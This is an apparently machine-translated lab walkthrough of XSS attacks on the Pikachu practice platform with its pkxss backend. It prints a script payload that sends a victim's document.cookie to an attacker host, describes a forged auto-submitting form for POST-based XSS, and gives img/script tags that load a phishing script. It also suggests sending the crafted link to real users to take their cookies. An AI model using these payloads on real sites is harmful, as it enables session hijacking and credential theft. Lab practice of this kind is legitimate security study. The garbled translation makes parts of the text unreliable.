The experiments conducted at Figure 3, a better understanding of the hazards and to the principle of xss
Go down the drones modify Pikachu, cookie.php revise their ip
Experiment 1: xss how to get cookie?
Simply copy the files you want to Pikachu pkxss drone attack in the machine site (www) buttons.
Under Login
Without any default data
1.1 GET type XSS exploit: cookie acquisition
Limit the length of the first character to modify out
pkxss background:
http://192.168.43.117/pkxss/pkxss_login.php
It is not any data
Enter the following statement in the input box, enter after Pikachu will be redirected to the home page
<script>document.location = 'http://192.168.43.117/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
Refresh pkxss background
In a real scenario, we can put a red box selected url sent to the user, once he visited friends this link, we will get his cookie value
We do use the above type XSS of GET, let's demonstrate
1.2 POST XSS type of use: cookie acquisition
First, let's see, the situation post (xss), the next login, user: admin, password: 123456 ,, submitted parameters, and packet capture
We can see that it did not pass parameters in the url
Packet capture and analysis.
By way of background reached the post. Although there xss, but the request is sent by post way, we can not be the target of malicious code embedded directly into the url to send
It should be how to get this case?
An attacker forged form automatically submits the page
Schematic (get red frame type selected part and principle is the same as above),
Next we look at allowing users to access, automatic form submission fake page (post.html in xcookie at Pikachu in the pkxss)
And modify pages for their vulnerability Pikachu drone ip, pkxss backstage for their ip. For convenience it can also, be vulnerability and pkxss page built on a single host.
After modification remember to go to the next restart phpstudy service (How to use other software, are the same, the next reboot environmental services on the line)
After modification, copy to, other host site (www).
Simulation of malicious sites:
http://192.168.43.118/post.html
When the user clicks on this link,, we will achieve our targeted attacks.
<img src="http://192.168.43.116/pikachu/pkxss/xfish/xfish.php" />
<script src="http://192.168.43.116/pikachu/pkxss/xfish/xfish.php"></script>